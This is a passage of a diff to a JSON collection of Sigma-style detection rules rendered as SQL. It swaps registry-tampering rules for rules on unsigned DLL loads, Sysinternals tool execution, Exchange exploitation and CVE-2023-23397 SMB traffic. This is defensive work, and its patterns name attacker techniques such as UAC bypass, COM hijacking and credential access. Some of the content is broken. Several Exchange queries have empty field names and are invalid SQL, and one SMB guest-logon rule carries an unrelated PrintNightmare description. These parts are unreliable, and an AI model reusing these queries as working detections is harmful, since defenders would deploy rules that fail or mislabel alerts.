TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Modification of Explorer Hidden Keys", - "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", - "author": "frack113", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_hide_file.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Add DisallowRun Execution to Registry", - "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", - "author": "frack113", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_disallowrun_execution.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.credential_access", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + ], + "filename": "win_lsa_server_normal_user_admin.yml" + }, + { + "title": "Sysinternals Tools AppX Versions Execution", + "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", + "status": "experimental", + "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the applications from the Windows Store" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "title": "Suspicious Rejected SMB Guest Logon From IP", + "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Unknown" + "Account fallback reasons (after failed login with specific account)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "win_smbclient_security_susp_failed_guest_logon.yml" }, { - "title": "New Application in AppCompat", - "id": "60936b49-fca0-4f32-993d-7415edcf9a5d", - "status": "test", - "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential CVE-2023-23397 Exploitation Attempt - SMB", + "id": "de96b824-02b0-4241-9356-7e9b47f04bac", + "status": "experimental", + "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.exfiltration", + "cve.2023.23397" ], "falsepositives": [ - "This rule is to explore new applications on an endpoint. False positives depends on the organization.", - "Newly setup system.", - "Legitimate installation of new application." + "Some false positives may occur from external trusted servers. Apply additional filters accordingly" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('30803', '30804', '30806') AND NOT (((ServerAddress LIKE '10.%' ESCAPE '\\' OR ServerAddress LIKE '192.168.%' ESCAPE '\\' OR ServerAddress LIKE '172.16.%' ESCAPE '\\' OR ServerAddress LIKE '172.17.%' ESCAPE '\\' OR ServerAddress LIKE '172.18.%' ESCAPE '\\' OR ServerAddress LIKE '172.19.%' ESCAPE '\\' OR ServerAddress LIKE '172.20.%' ESCAPE '\\' OR ServerAddress LIKE '172.21.%' ESCAPE '\\' OR ServerAddress LIKE '172.22.%' ESCAPE '\\' OR ServerAddress LIKE '172.23.%' ESCAPE '\\' OR ServerAddress LIKE '172.24.%' ESCAPE '\\' OR ServerAddress LIKE '172.25.%' ESCAPE '\\' OR ServerAddress LIKE '172.26.%' ESCAPE '\\' OR ServerAddress LIKE '172.27.%' ESCAPE '\\' OR ServerAddress LIKE '172.28.%' ESCAPE '\\' OR ServerAddress LIKE '172.29.%' ESCAPE '\\' OR ServerAddress LIKE '172.30.%' ESCAPE '\\' OR ServerAddress LIKE '172.31.%' ESCAPE '\\' OR ServerAddress LIKE '127.%' ESCAPE '\\' OR ServerAddress LIKE '169.254.%' ESCAPE '\\'))))" ], - "filename": "registry_set_new_application_appcompat.yml" + "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml" }, { - "title": "ServiceDll Hijack", - "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", - "status": "experimental", - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", - "author": "frack113", + "title": "MSExchange Transport Agent Installation - Builtin", + "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "status": "test", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1505.002" ], "falsepositives": [ - "Administrative scripts", - "Installation of a service" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" ], - "filename": "registry_set_servicedll_hijack.yml" + "filename": "win_exchange_transportagent.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ "attack.persistence", - "attack.t1133" + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "Disable UAC Using Registry", - "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "status": "experimental", - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "author": "frack113", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_disable_uac_registry.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.lateral_movement", + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "Suspicious Application Installed", + "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Packages or applications being legitimately used by users or administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 